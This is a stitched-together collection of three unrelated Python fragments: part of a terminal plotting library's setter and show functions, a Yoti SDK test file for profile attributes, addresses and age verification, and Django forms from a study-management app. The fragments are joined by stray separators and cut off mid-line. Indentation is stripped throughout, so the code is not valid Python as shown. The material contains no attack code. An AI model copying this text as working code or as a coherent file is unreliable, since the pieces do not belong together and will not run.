_fig.subplot.signals = 0
clear_data.__doc__ = _docstrings.clear_data_doc
cld = clear_data
##############################################
############ Set Functions #############
##############################################
def plotsize(width = None, height = None):
width, height = _utility.set_first_to_both(width, height)
width, height = _utility.set_list_to_both(width, height)
_fig.subplot.width_set = width
_fig.subplot.height_set = height
plotsize.__doc__ = _docstrings.plotsize_doc
plot_size = plotsize
def title(label = None):
label = _utility.set_if_none(label, _fig.subplot.title)
label = None if label == "" else label
_fig.subplot.title = label
title.__doc__ = _docstrings.title_doc
def xlabel(label = ""):
label = _utility.set_if_none(label, _fig.subplot.xlabel)
_fig.subplot.xlabel = label
xlabel.__doc__ = _docstrings.xlabel_doc
def ylabel(label_left = "", label_right = ""):
label_left = _utility.set_if_none(label_left, _fig.subplot.ylabel[0])
label_right = _utility.set_if_none(label_right, _fig.subplot.ylabel[1])
_fig.subplot.ylabel = [label_left, label_right]
ylabel.__doc__ = _docstrings.ylabel_doc
def xaxes(x = None, y = None):
x, y = _utility.set_first_to_both(x, y)
y = bool(y)
x, y = _utility.set_list_if_none([x, y], _fig.subplot.xaxes)
x = bool(x)
x, y = _utility.set_list_to_both(x, y)
_fig.subplot.xaxes = [x, y]
xaxes.__doc__ = _docstrings.xaxes_doc
def yaxes(x = None, y = None):
x, y = _utility.set_first_to_both(x, y)
y = bool(y)
x, y = _utility.set_list_if_none([x, y], _fig.subplot.yaxes)
x = bool(x)
x, y = _utility.set_list_to_both(x, y)
_fig.subplot.yaxes = [x, y]
yaxes.__doc__ = _docstrings.yaxes_doc
def grid(x = None, y = None):
x, y = _utility.set_first_to_both(x, y)
y = bool(y)
x, y = _utility.set_list_if_none([x, y], _fig.subplot.grid)
x = bool(x)
x, y = _utility.set_list_to_both(x, y)
_fig.subplot.grid = [x, y]
grid.__doc__ = _docstrings.grid_doc
def axes_color(color = "white"):
color = _utility.set_if_none(color, _fig.subplot.axes_color)
color = "white" if color not in list(_utility.background_color.keys()) else color
_fig.subplot.axes_color = color
axes_color.__doc__ = _docstrings.axes_color_doc
def ticks_color(color = "black"):
color = _utility.set_if_none(color, _fig.subplot.ticks_color)
color = "black" if color not in list(_utility.fullground_color.keys()) else color
_fig.subplot.ticks_color = color
ticks_color.__doc__ = _docstrings.ticks_color_doc
def canvas_color(color = "white"):
color = _utility.set_if_none(color, _fig.subplot.canvas_color)
color = "white" if color not in list(_utility.background_color.keys()) else color
_fig.subplot.canvas_color = color
canvas_color.__doc__ = _docstrings.canvas_color_doc
def _colorless_subplot(subplot):
subplot.point_color = ["none"] * len(subplot.point_color)
subplot.line_color = ["none"] * len(subplot.line_color)
subplot.axes_color = "none"
subplot.ticks_color = "none"
subplot.canvas_color = "none"
def colorless():
_colorless_subplot(_fig.subplot)
colorless.__doc__ = _docstrings.colorless_doc
cls = colorless
def xlim(left = None, right = None):
left, right = _utility.set_list_to_both(left, right)
left, right = min(left, right), max(left, right)
_fig.subplot.xlim_plot = [left, right]
xlim.__doc__ = _docstrings.xlim_doc
def ylim(lower = None, upper = None, yaxis = "left"):
lower, upper = _utility.set_list_to_both(lower, upper)
lower, upper = min(lower, upper), max(lower, upper)
if yaxis == "left":
_fig.subplot.ylim_plot_left = [lower, upper]
elif yaxis == "right":
_fig.subplot.ylim_plot_right = [lower, upper]
ylim.__doc__ = _docstrings.ylim_doc
def ticks(x = None, y = None):
x, y = _utility.set_first_to_both(x, y)
x, y = _utility.set_list_to_both(x, y)
x_none, y_none = 5, 7
x = _utility.set_if_none(x, x_none)
y = _utility.set_if_none(y, y_none)
_fig.subplot.ticks = [x, y]
ticks.__doc__ = _docstrings.ticks_doc
def xticks(ticks = [], labels = None):
ticks, labels = _utility.set_first_to_both(list(ticks), labels)
labels = list(map(str, list(labels)))
ticks, labels = _utility.sort_data(ticks, labels)
_fig.subplot.xticks, _fig.subplot.xlabels = ticks, labels
_fig.subplot.ticks[0] = len(ticks)
xticks.__doc__ = _docstrings.xticks_doc
def yticks(ticks = [], labels = None, yaxis = "left"):
ticks, labels = _utility.set_first_to_both(list(ticks), labels)
labels = list(map(str, list(labels)))
ticks, labels = _utility.sort_data(ticks, labels)
if yaxis == "left":
_fig.subplot.yticks_left, _fig.subplot.ylabels_left = ticks, labels
elif yaxis == "right":
_fig.subplot.yticks_right, _fig.subplot.ylabels_right = ticks, labels
_fig.subplot.ticks[1] = len(ticks)
yticks.__doc__ = _docstrings.yticks_doc
def xscale(scale = None):
scale = _utility.set_if_none(scale, _fig.subplot.xscale)
scale = "linear" if not (scale in ["linear", "log"]) else scale
_fig.subplot.xscale = scale
xscale.__doc__ = _docstrings.xscale_doc
def yscale(scale = None, yaxis = "left"):
scale = _utility.set_if_none(scale, _fig.subplot.xscale)
scale = "linear" if not (scale in ["linear", "log"]) else scale
if yaxis == "right":
_fig.subplot.yscale[1] = scale
else:
_fig.subplot.yscale[0] = scale
yscale.__doc__ = _docstrings.yscale_doc
##############################################
########### Show Functions #############
##############################################
def show(hide = False):
_figure_size_max()
_figure_size()
#_plots_size()
_coherent_sizes()
for r in range(_fig.rows):
for c in range(_fig.cols):
subplot = _fig.subplots[r][c]
_previous_size(subplot)
_sort_data(subplot)
_height(subplot)
_ylim_data(subplot)
_ylim_plot(subplot)
_yticks(subplot)
_width(subplot)
_xlim_data(subplot)
_xlim_plot(subplot)
_xticks(subplot)
_matrix(subplot)
_add_xgrid(subplot)
_add_ygrid(subplot)
_add_data(subplot)
_add_legend(subplot)
_add_yaxis(subplot)
_add_xaxis(subplot)
_add_title(subplot)
_add_labels(subplot)
_join_matrices()
_fig.canvas = _utility.get_canvas(_fig.matrix)
if hide:
return
_utility.write(_fig.canvas)
show.__doc__ = _docstrings.show_doc
def _figure_size_max():
_fig.width_max, _fig.height_max = terminal_size()
_fig.height_max -= 3
_fig.width_max -= (_fig.cols - 1)
_fig.height_max -= (_fig.rows - 1)
def _figure_size():
# width = _utility.set_if_none(_fig.width, _fig.width_max)
# height = _utility.set_if_none(_fig.height, _fig.height_max)
# width = abs(int(width))
# height = abs(int(height))
# width = _fig.width_max if | |
# -*- coding: utf-8 -*-
import collections
import json
import logging
import pytest
from yoti_python_sdk import config
from yoti_python_sdk.attribute import Attribute
from yoti_python_sdk.profile import Profile, ApplicationProfile
from yoti_python_sdk.age_verification import AgeVerification
from yoti_python_sdk.protobuf.protobuf import Protobuf
from yoti_python_sdk.tests import attribute_fixture_parser, image_helper
from yoti_python_sdk.tests.protobuf_attribute import ProtobufAttribute
from yoti_python_sdk.image import Image
ADDRESS_FORMAT_KEY = "address_format"
ADDRESS_FORMAT_VALUE = 1
INDIA_FORMAT_VALUE = 2
USA_FORMAT_VALUE = 3
BUILDING_NUMBER_KEY = "building_number"
BUILDING_NUMBER_VALUE = "15a"
CARE_OF_KEY = "care_of"
CARE_OF_VALUE = "S/O: Name"
STATE_KEY = "state"
INDIA_STATE_VALUE = "Punjab"
USA_STATE_VALUE = "AL"
BUILDING_KEY = "building"
BUILDING_VALUE = "House No.1111-A"
STREET_KEY = "street"
STREET_VALUE = "42nd Street"
DISTRICT_KEY = "district"
DISTRICT_VALUE = "DISTRICT 10"
SUBDISTRICT_KEY = "subdistrict"
SUBDISTRICT_VALUE = "Sub-DISTRICT 10"
POST_OFFICE_KEY = "post_office"
INDIA_POST_OFFICE_VALUE = "Rajguru Nagar"
ADDRESS_LINE_1_KEY = "address_line_1"
ADDRESS_LINE_1_VALUE = "15a North Street"
TOWN_CITY_KEY = "town_city"
TOWN_CITY_VALUE = "TOWN/CITY NAME"
POSTAL_CODE_KEY = "postal_code"
POSTAL_CODE_VALUE = "SM5 2HW"
INDIA_POSTAL_CODE_VALUE = "141012"
USA_POSTAL_CODE_VALUE = "36201"
COUNTRY_ISO_KEY = "country_iso"
COUNTRY_ISO_VALUE = "GBR"
INDIA_COUNTRY_ISO_VALUE = "IND"
USA_COUNTRY_ISO_VALUE = "USA"
COUNTRY_KEY = "country"
COUNTRY_VALUE = "UK"
INDIA_COUNTRY_VALUE = "India"
USA_COUNTRY_VALUE = "USA"
FORMATTED_ADDRESS_VALUE = "15a North Street\nCARSHALTON\nSM5 2HW\nUK"
INDIA_FORMATTED_ADDRESS_VALUE = "S/O: Name\nHouse No.1111-A\n42nd Street\nTOWN/CITY NAME\nSub-DISTRICT 10\nDISTRICT 10\nPunjab\n141012\nRajgura Nagar\nIndia"
USA_FORMATTED_ADDRESS_VALUE = "15a North Street\nTOWN/CITY NAME\nAL\n36201\nUSA"
USA_DOCUMENT_DETAILS = "DRIVING_LICENCE USA 12345678 2016-05-01"
INDIA_DOCUMENT_DETAILS = "DRIVING_LICENCE IND MH-05-2006-1234567 2016-05-01"
DRIVING_LICENCE = "DRIVING_LICENCE"
USA_DRIVING_LICENCE_NUMBER = "12345678"
IND_DRIVING_LICENCE_NUMBER = "MH-05-2006-1234567"
EXPIRY_DATE = "2016-05-01"
def create_single_attribute_list(name, value, anchors, content_type):
attribute = ProtobufAttribute(name, value, anchors, content_type)
attribute_list = list()
attribute_list.append(attribute)
return attribute_list
def create_attribute_list_with_selfie_field():
return create_single_attribute_list(
name=config.ATTRIBUTE_SELFIE,
value="base64(ง •̀_•́)ง",
anchors=None,
content_type=Protobuf.CT_JPEG,
)
def create_attribute_list_with_application_logo():
return create_single_attribute_list(
name=config.ATTRIBUTE_APPLICATION_LOGO,
value="base64(┛ಠ_ಠ)┛彡┻━┻",
anchors=None,
content_type=Protobuf.CT_JPEG,
)
def create_attribute_list_with_email_field():
return create_single_attribute_list(
name=config.ATTRIBUTE_EMAIL_ADDRESS,
value="<EMAIL>".encode(),
anchors=None,
content_type=Protobuf.CT_STRING,
)
def create_attribute_list_with_structured_postal_address_field(json_address_value):
return create_single_attribute_list(
name=config.ATTRIBUTE_STRUCTURED_POSTAL_ADDRESS,
value=json_address_value,
anchors=None,
content_type=Protobuf.CT_JSON,
)
@pytest.mark.parametrize(
"string, expected_int", [("0", 0), ("1", 1), ("123", 123), ("-10", -10), ("-1", -1)]
)
def test_try_parse_int_value(string, expected_int):
attribute_name = "int_attribute"
attribute_list = create_single_attribute_list(
name=attribute_name,
value=str.encode(string),
anchors=None,
content_type=Protobuf.CT_INT,
)
profile = Profile(attribute_list)
int_attribute = profile.get_attribute(attribute_name)
assert int_attribute.value == expected_int
def test_error_parsing_attribute_has_none_value():
int_attribute_name = "int_attribute"
attribute_list = create_single_attribute_list(
name=int_attribute_name,
value=str.encode("invalid_int"),
anchors=None,
content_type=Protobuf.CT_INT,
)
# disable logging for the below call: warning shown as int is invalid
logger = logging.getLogger()
logger.propagate = False
profile = Profile(attribute_list)
logger.propagate = True
assert profile.get_attribute(int_attribute_name) is None
@pytest.mark.parametrize(
"content_type",
[
Protobuf.CT_DATE,
Protobuf.CT_INT,
Protobuf.CT_JPEG,
Protobuf.CT_PNG,
Protobuf.CT_JSON,
Protobuf.CT_UNDEFINED,
],
)
def test_parse_empty_values_returns_none(content_type):
attribute_name = "attribute_name"
attribute_list = create_single_attribute_list(
name=attribute_name, value=b"", anchors=None, content_type=content_type
)
# disable logging for the below call: warning logged as value is empty
logger = logging.getLogger()
logger.propagate = False
profile = Profile(attribute_list)
logger.propagate = True
assert profile.get_attribute(attribute_name) is None
@pytest.mark.parametrize("value", [b"", "".encode()])
def test_parse_empty_string_value_returns_attribute(value):
attribute_name = "attribute_name"
attribute_list = create_single_attribute_list(
name=attribute_name, value=value, anchors=None, content_type=Protobuf.CT_STRING
)
profile = Profile(attribute_list)
assert profile.get_attribute(attribute_name).value == ""
def test_error_parsing_attribute_does_not_affect_other_attribute():
string_attribute_name = "string_attribute"
int_attribute_name = "int_attribute"
string_value = "string"
attribute_list = list()
attribute_list.append(
ProtobufAttribute(
name=string_attribute_name,
value=str.encode(string_value),
anchors=None,
content_type=Protobuf.CT_STRING,
)
)
attribute_list.append(
ProtobufAttribute(
name=int_attribute_name,
value=str.encode("invalid_int"),
anchors=None,
content_type=Protobuf.CT_INT,
)
)
# disable logging for the below call: warning shown as int is invalid
logger = logging.getLogger()
logger.propagate = False
profile = Profile(attribute_list)
logger.propagate = True
assert len(profile.attributes) == 1
retrieved_string_attribute = profile.get_attribute(string_attribute_name)
assert retrieved_string_attribute.name == string_attribute_name
assert retrieved_string_attribute.value == string_value
def test_try_parse_structured_postal_address_uk():
structured_postal_address = {
ADDRESS_FORMAT_KEY: ADDRESS_FORMAT_VALUE,
BUILDING_NUMBER_KEY: BUILDING_NUMBER_VALUE,
ADDRESS_LINE_1_KEY: ADDRESS_LINE_1_VALUE,
TOWN_CITY_KEY: TOWN_CITY_VALUE,
POSTAL_CODE_KEY: POSTAL_CODE_VALUE,
COUNTRY_ISO_KEY: COUNTRY_ISO_VALUE,
COUNTRY_KEY: COUNTRY_VALUE,
config.KEY_FORMATTED_ADDRESS: FORMATTED_ADDRESS_VALUE,
}
structured_postal_address_json = json.dumps(structured_postal_address).encode()
profile = Profile(
create_attribute_list_with_structured_postal_address_field(
structured_postal_address_json
)
)
actual_structured_postal_address = profile.structured_postal_address.value
actual_address_format = actual_structured_postal_address[ADDRESS_FORMAT_KEY]
actual_building_number = actual_structured_postal_address[BUILDING_NUMBER_KEY]
actual_address_line_1 = actual_structured_postal_address[ADDRESS_LINE_1_KEY]
actual_town_city = actual_structured_postal_address[TOWN_CITY_KEY]
actual_postal_code = actual_structured_postal_address[POSTAL_CODE_KEY]
actual_country_iso = actual_structured_postal_address[COUNTRY_ISO_KEY]
actual_country = actual_structured_postal_address[COUNTRY_KEY]
actual_formatted_address = actual_structured_postal_address[
config.KEY_FORMATTED_ADDRESS
]
assert type(actual_structured_postal_address) is collections.OrderedDict
assert actual_address_format == ADDRESS_FORMAT_VALUE
assert actual_building_number == BUILDING_NUMBER_VALUE
assert actual_address_line_1 == ADDRESS_LINE_1_VALUE
assert actual_town_city == TOWN_CITY_VALUE
assert actual_postal_code == POSTAL_CODE_VALUE
assert actual_country_iso == COUNTRY_ISO_VALUE
assert actual_country == COUNTRY_VALUE
assert actual_formatted_address == FORMATTED_ADDRESS_VALUE
def test_other_json_type_is_parsed():
json_attribute_name = "other_json"
key_a = "keyA"
key_b = "keyB"
value_a = "valueA"
value_b = "valueB"
json_value = {key_a: value_a, key_b: value_b}
encoded_json = json.dumps(json_value).encode()
attribute_list = create_single_attribute_list(
name=json_attribute_name,
value=encoded_json,
anchors=None,
content_type=Protobuf.CT_JSON,
)
profile = Profile(attribute_list)
retrieved_attribute = profile.get_attribute(json_attribute_name)
assert retrieved_attribute.name == json_attribute_name
assert type(retrieved_attribute.value) is collections.OrderedDict
assert retrieved_attribute.value[key_a] == value_a
assert retrieved_attribute.value[key_b] == value_b
def test_try_parse_structured_postal_address_india():
structured_postal_address = {
ADDRESS_FORMAT_KEY: INDIA_FORMAT_VALUE,
CARE_OF_KEY: CARE_OF_VALUE,
BUILDING_KEY: BUILDING_VALUE,
STREET_KEY: STREET_VALUE,
TOWN_CITY_KEY: TOWN_CITY_VALUE,
SUBDISTRICT_KEY: SUBDISTRICT_VALUE,
DISTRICT_KEY: DISTRICT_VALUE,
STATE_KEY: INDIA_STATE_VALUE,
POSTAL_CODE_KEY: INDIA_POSTAL_CODE_VALUE,
POST_OFFICE_KEY: INDIA_POST_OFFICE_VALUE,
COUNTRY_ISO_KEY: INDIA_COUNTRY_ISO_VALUE,
COUNTRY_KEY: INDIA_COUNTRY_VALUE,
config.KEY_FORMATTED_ADDRESS: INDIA_FORMATTED_ADDRESS_VALUE,
}
structured_postal_address_bytes = json.dumps(structured_postal_address).encode()
profile = Profile(
create_attribute_list_with_structured_postal_address_field(
structured_postal_address_bytes
)
)
actual_structured_postal_address_profile = profile.structured_postal_address.value
assert type(actual_structured_postal_address_profile) is collections.OrderedDict
assert (
actual_structured_postal_address_profile[ADDRESS_FORMAT_KEY]
== INDIA_FORMAT_VALUE
)
assert actual_structured_postal_address_profile[CARE_OF_KEY] == CARE_OF_VALUE
assert actual_structured_postal_address_profile[BUILDING_KEY] == BUILDING_VALUE
assert actual_structured_postal_address_profile[STREET_KEY] == STREET_VALUE
assert actual_structured_postal_address_profile[TOWN_CITY_KEY] == TOWN_CITY_VALUE
assert (
actual_structured_postal_address_profile[SUBDISTRICT_KEY] == SUBDISTRICT_VALUE
)
assert actual_structured_postal_address_profile[DISTRICT_KEY] == DISTRICT_VALUE
assert actual_structured_postal_address_profile[STATE_KEY] == INDIA_STATE_VALUE
assert (
actual_structured_postal_address_profile[POSTAL_CODE_KEY]
== INDIA_POSTAL_CODE_VALUE
)
assert (
actual_structured_postal_address_profile[POST_OFFICE_KEY]
== INDIA_POST_OFFICE_VALUE
)
assert (
actual_structured_postal_address_profile[COUNTRY_ISO_KEY]
== INDIA_COUNTRY_ISO_VALUE
)
assert actual_structured_postal_address_profile[COUNTRY_KEY] == INDIA_COUNTRY_VALUE
assert (
actual_structured_postal_address_profile[config.KEY_FORMATTED_ADDRESS]
== INDIA_FORMATTED_ADDRESS_VALUE
)
def test_try_parse_structured_postal_address_usa():
structured_postal_address = {
ADDRESS_FORMAT_KEY: USA_FORMAT_VALUE,
ADDRESS_LINE_1_KEY: ADDRESS_LINE_1_VALUE,
TOWN_CITY_KEY: TOWN_CITY_VALUE,
STATE_KEY: USA_STATE_VALUE,
POSTAL_CODE_KEY: USA_POSTAL_CODE_VALUE,
COUNTRY_ISO_KEY: USA_COUNTRY_ISO_VALUE,
COUNTRY_KEY: USA_COUNTRY_VALUE,
config.KEY_FORMATTED_ADDRESS: USA_FORMATTED_ADDRESS_VALUE,
}
structured_postal_address_bytes = json.dumps(structured_postal_address).encode()
profile = Profile(
create_attribute_list_with_structured_postal_address_field(
structured_postal_address_bytes
)
)
actual_structured_postal_address_profile = profile.structured_postal_address.value
assert type(actual_structured_postal_address_profile) is collections.OrderedDict
assert (
actual_structured_postal_address_profile[ADDRESS_FORMAT_KEY] == USA_FORMAT_VALUE
)
assert (
actual_structured_postal_address_profile[ADDRESS_LINE_1_KEY]
== ADDRESS_LINE_1_VALUE
)
assert actual_structured_postal_address_profile[TOWN_CITY_KEY] == TOWN_CITY_VALUE
assert actual_structured_postal_address_profile[STATE_KEY] == USA_STATE_VALUE
assert (
actual_structured_postal_address_profile[POSTAL_CODE_KEY]
== USA_POSTAL_CODE_VALUE
)
assert (
actual_structured_postal_address_profile[COUNTRY_ISO_KEY]
== USA_COUNTRY_ISO_VALUE
)
assert actual_structured_postal_address_profile[COUNTRY_KEY] == USA_COUNTRY_VALUE
assert (
actual_structured_postal_address_profile[config.KEY_FORMATTED_ADDRESS]
== USA_FORMATTED_ADDRESS_VALUE
)
def test_try_parse_structured_postal_address_nested_json():
formatted_address_json = {
"item1": [[1, "a1"], [2, "a2"]],
"item2": [[3, "b3"], [4, "b4"]],
}
structured_postal_address = {
ADDRESS_FORMAT_KEY: ADDRESS_FORMAT_VALUE,
BUILDING_NUMBER_KEY: BUILDING_NUMBER_VALUE,
ADDRESS_LINE_1_KEY: ADDRESS_LINE_1_VALUE,
TOWN_CITY_KEY: TOWN_CITY_VALUE,
POSTAL_CODE_KEY: POSTAL_CODE_VALUE,
COUNTRY_ISO_KEY: COUNTRY_ISO_VALUE,
COUNTRY_KEY: COUNTRY_VALUE,
config.KEY_FORMATTED_ADDRESS: formatted_address_json,
}
structured_postal_address_bytes = json.dumps(structured_postal_address).encode()
profile = Profile(
create_attribute_list_with_structured_postal_address_field(
structured_postal_address_bytes
)
)
actual_structured_postal_address_profile = profile.structured_postal_address.value
assert type(actual_structured_postal_address_profile) is collections.OrderedDict
assert (
actual_structured_postal_address_profile[ADDRESS_FORMAT_KEY]
== ADDRESS_FORMAT_VALUE
)
assert (
actual_structured_postal_address_profile[BUILDING_NUMBER_KEY]
== BUILDING_NUMBER_VALUE
)
assert (
actual_structured_postal_address_profile[ADDRESS_LINE_1_KEY]
== ADDRESS_LINE_1_VALUE
)
assert actual_structured_postal_address_profile[TOWN_CITY_KEY] == TOWN_CITY_VALUE
assert (
actual_structured_postal_address_profile[POSTAL_CODE_KEY] == POSTAL_CODE_VALUE
)
assert (
actual_structured_postal_address_profile[COUNTRY_ISO_KEY] == COUNTRY_ISO_VALUE
)
assert actual_structured_postal_address_profile[COUNTRY_KEY] == COUNTRY_VALUE
assert (
actual_structured_postal_address_profile[config.KEY_FORMATTED_ADDRESS]
== formatted_address_json
)
def test_set_address_to_be_formatted_address():
structured_postal_address = {config.KEY_FORMATTED_ADDRESS: FORMATTED_ADDRESS_VALUE}
structured_postal_address_bytes = json.dumps(structured_postal_address).encode()
profile = Profile(
create_attribute_list_with_structured_postal_address_field(
structured_postal_address_bytes
)
)
assert profile.postal_address.value == FORMATTED_ADDRESS_VALUE
def test_document_images():
document_images_attribute = attribute_fixture_parser.get_attribute_from_base64_text(
attribute_fixture_parser.ATTRIBUTE_DOCUMENT_IMAGES
)
attribute_list = list()
attribute_list.append(document_images_attribute)
profile = Profile(attribute_list)
document_images_attribute = profile.document_images
assert len(document_images_attribute.value) == 2
image_helper.assert_is_expected_image(
document_images_attribute.value[0], "jpeg", "vWgD//2Q=="
)
image_helper.assert_is_expected_image(
document_images_attribute.value[1], "jpeg", "38TVEH/9k="
)
def test_nested_multi_value():
attribute_name = "nested_multi_value"
inner_multi_value = attribute_fixture_parser.parse_multi_value()
outer_tuple = (inner_multi_value,)
profile = Profile(profile_attributes=None)
profile.attributes[attribute_name] = Attribute(
name=attribute_name, value=outer_tuple, anchors=None
)
retrieved_multi_value = profile.get_attribute(attribute_name)
assert isinstance(retrieved_multi_value.value, tuple)
for item in retrieved_multi_value.value:
assert isinstance(item, tuple)
image_helper.assert_is_expected_image(
retrieved_multi_value.value[0][0], "jpeg", "vWgD//2Q=="
)
image_helper.assert_is_expected_image(
retrieved_multi_value.value[0][1], "jpeg", "38TVEH/9k="
)
def test_get_attribute_document_images():
attribute_list = create_single_attribute_list(
name=config.ATTRIBUTE_DOCUMENT_IMAGES,
value=[],
anchors=None,
content_type=Protobuf.CT_MULTI_VALUE,
)
profile = Profile(attribute_list)
assert (
profile.get_attribute(config.ATTRIBUTE_DOCUMENT_IMAGES)
== profile.document_images
)
def test_get_attribute_selfie():
profile = Profile(create_attribute_list_with_selfie_field())
assert profile.get_attribute(config.ATTRIBUTE_SELFIE) == profile.selfie
def test_get_attribute_email_address():
profile = Profile(create_attribute_list_with_email_field())
assert (
profile.get_attribute(config.ATTRIBUTE_EMAIL_ADDRESS) == profile.email_address
)
def test_get_attribute_returns_none():
profile = Profile(None)
assert profile.get_attribute(config.ATTRIBUTE_SELFIE) is None
def test_get_document_details_usa():
attribute_list = create_single_attribute_list(
name=config.ATTRIBUTE_DOCUMENT_DETAILS,
value=USA_DOCUMENT_DETAILS.encode(),
anchors=None,
content_type=Protobuf.CT_STRING,
)
profile = Profile(attribute_list)
document = profile.document_details.value
assert document.document_type == DRIVING_LICENCE
assert document.issuing_country == USA_COUNTRY_ISO_VALUE
assert document.document_number == USA_DRIVING_LICENCE_NUMBER
assert document.expiration_date.isoformat() == EXPIRY_DATE
def test_get_document_details_india():
attribute_list = create_single_attribute_list(
name=config.ATTRIBUTE_DOCUMENT_DETAILS,
value=INDIA_DOCUMENT_DETAILS.encode(),
anchors=None,
content_type=Protobuf.CT_STRING,
)
profile = Profile(attribute_list)
document = profile.document_details.value
assert document.document_type == DRIVING_LICENCE
assert document.issuing_country == INDIA_COUNTRY_ISO_VALUE
assert document.document_number == IND_DRIVING_LICENCE_NUMBER
assert document.expiration_date.isoformat() == EXPIRY_DATE
def test_create_application_profile_with_name():
attribute_list = create_single_attribute_list(
name=config.ATTRIBUTE_APPLICATION_NAME,
value="yoti-sdk-test".encode(),
anchors=None,
content_type=Protobuf.CT_STRING,
)
app_profile = ApplicationProfile(attribute_list)
assert (
app_profile.get_attribute(config.ATTRIBUTE_APPLICATION_NAME)
== app_profile.application_name
)
assert isinstance(app_profile, ApplicationProfile)
def test_create_application_profile_with_url():
attribute_list = create_single_attribute_list(
name=config.ATTRIBUTE_APPLICATION_URL,
value="https://yoti.com".encode(),
anchors=None,
content_type=Protobuf.CT_STRING,
)
app_profile = ApplicationProfile(attribute_list)
assert (
app_profile.get_attribute(config.ATTRIBUTE_APPLICATION_URL)
== app_profile.application_url
)
assert isinstance(app_profile, ApplicationProfile)
def test_create_application_profile_with_receipt_bgcolor():
attribute_list = create_single_attribute_list(
name=config.ATTRIBUTE_APPLICATION_RECEIPT_BGCOLOR,
value="#FFFFFF".encode(),
anchors=None,
content_type=Protobuf.CT_STRING,
)
app_profile = ApplicationProfile(attribute_list)
assert (
app_profile.get_attribute(config.ATTRIBUTE_APPLICATION_RECEIPT_BGCOLOR)
== app_profile.application_receipt_bg_color
)
assert isinstance(app_profile, ApplicationProfile)
def test_create_application_profile_with_logo():
attribute_list = create_attribute_list_with_application_logo()
app_profile = ApplicationProfile(attribute_list)
app_logo = app_profile.application_logo
assert isinstance(app_logo.value, Image)
assert (
app_profile.get_attribute(config.ATTRIBUTE_APPLICATION_LOGO)
== app_profile.application_logo
)
assert isinstance(app_profile, ApplicationProfile)
@pytest.mark.parametrize(
"attribute_value,expected_age_over,expected_value",
[("true", 18, True), ("true", 21, True), ("false", 18, False)],
)
def test_get_age_over_verification(attribute_value, expected_age_over, expected_value):
attribute_list = create_single_attribute_list(
name=config.ATTRIBUTE_AGE_OVER + str(expected_age_over),
value=attribute_value.encode(),
anchors=None,
content_type=Protobuf.CT_STRING,
)
human_profile = Profile(attribute_list)
print(human_profile.attributes)
age_verifications = human_profile.get_age_verifications()
age_verification = human_profile.find_age_over_verification(expected_age_over)
assert len(age_verifications) == 1
assert isinstance(age_verification, AgeVerification)
assert age_verification.result is expected_value
@pytest.mark.parametrize(
"attribute_value,expected_age_under,expected_value",
[("true", 18, True), ("true", 21, True), ("false", 18, False)],
)
def test_get_age_under_verification(
attribute_value, expected_age_under, expected_value
):
attribute_list = create_single_attribute_list(
name=config.ATTRIBUTE_AGE_UNDER + str(expected_age_under),
value=attribute_value.encode(),
anchors=None,
content_type=Protobuf.CT_STRING,
)
human_profile = Profile(attribute_list)
print(human_profile.attributes)
age_verifications = human_profile.get_age_verifications()
age_verification = human_profile.find_age_under_verification(expected_age_under)
assert len(age_verifications) == 1
assert isinstance(age_verification, AgeVerification)
assert age_verification.result is expected_value
def test_get_age_verifications():
attribute_list = create_single_attribute_list(
name=config.ATTRIBUTE_AGE_UNDER + str(18),
value="true".encode(),
anchors=None,
content_type=Protobuf.CT_STRING,
)
human_profile = Profile(attribute_list)
age_verifications = human_profile.get_age_verifications()
assert len(age_verifications) == 1
def test_expect_none_when_no_age_over_verification_exists():
attribute_list = create_single_attribute_list(
name=config.ATTRIBUTE_GIVEN_NAMES,
value="Jenny",
anchors=None,
content_type=Protobuf.CT_STRING,
)
human_profile = Profile(attribute_list)
age_over_verification = human_profile.find_age_over_verification(18)
assert age_over_verification is None
def test_expect_none_when_no_age_under_verification_exists():
attribute_list = create_single_attribute_list(
name=config.ATTRIBUTE_GIVEN_NAMES,
value="Jenny",
anchors=None,
content_type=Protobuf.CT_STRING,
| |
None)
super().__init__(*args, **kwargs)
# self.fields exists after super.__init__()
if self._user:
# make sure lines are in a readable study
access = models.Study.access_filter(self._user, via="study")
queryset = models.Line.objects.filter(access).distinct()
self.fields["lineId"].queryset = queryset
def clean(self):
super().clean()
# if no explicit contact is set, make the current user the contact
# TODO: handle contact_extra too
if not self.cleaned_data.get("contact", None):
self.cleaned_data["contact"] = self._user
def save(self, commit=True, *args, **kwargs):
# perform updates atomically to the study and related user permissions
with transaction.atomic():
# save the study
s = super().save(commit=commit, *args, **kwargs)
# make sure the creator has write permission, and ESE has read
s.userpermission_set.update_or_create(
user=s.created.mod_by, permission_type=StudyPermission.WRITE
)
# if configured, apply default group read permissions to the new study
_SETTING_NAME = "EDD_DEFAULT_STUDY_READ_GROUPS"
default_group_names = getattr(settings, _SETTING_NAME, None)
if default_group_names:
default_groups = Group.objects.filter(name__in=default_group_names)
default_groups = default_groups.values_list("pk", flat=True)
requested_groups = len(default_group_names)
found_groups = len(default_groups)
if requested_groups != found_groups:
logger.error(
f"Setting only {found_groups} of {requested_groups} read permissions "
f"for study `{s.slug}`."
)
logger.error(
f"Check that all group names set in the `{_SETTING_NAME}` value in "
"Django settings is valid."
)
for group in default_groups:
s.grouppermission_set.update_or_create(
group_id=group,
defaults={"permission_type": StudyPermission.READ},
)
# create copies of passed in Line IDs
self.save_lines(s)
return s
def save_lines(self, study):
""" Saves copies of Line IDs passed to the form on the study. """
to_add = []
lines = self.cleaned_data.get("lineId", None)
if lines is None:
lines = []
for line in lines:
line.pk = line.id = None
line.study = study
line.study_id = study.id
line.uuid = None
to_add.append(line)
study.line_set.add(*to_add, bulk=False)
class CreateAttachmentForm(forms.ModelForm):
""" Form to create a new attachment. """
class Meta:
model = Attachment
fields = ("file", "description")
labels = {"file": _(""), "description": _("Description")}
help_texts = {"description": _(""), "file": _("")}
widgets = {"description": forms.widgets.TextInput()}
def __init__(self, *args, **kwargs):
# removes default hard-coded suffix of colon character on all labels
kwargs.setdefault("label_suffix", "")
# store the parent EDDObject
self._parent = kwargs.pop("edd_object", None)
super().__init__(*args, **kwargs)
def save(self, commit=True, *args, **kwargs):
a = super().save(commit=False, *args, **kwargs)
a.object_ref = self._parent
if commit:
a.save()
return a
class CreateCommentForm(forms.ModelForm):
""" Form to create a new comment. """
class Meta:
model = Comment
fields = ("body",)
labels = {"body": _("")}
help_texts = {"body": _("")}
def __init__(self, *args, **kwargs):
# removes default hard-coded suffix of colon character on all labels
kwargs.setdefault("label_suffix", "")
# store the parent EDDObject
self._parent = kwargs.pop("edd_object", None)
super().__init__(*args, **kwargs)
def save(self, commit=True, *args, **kwargs):
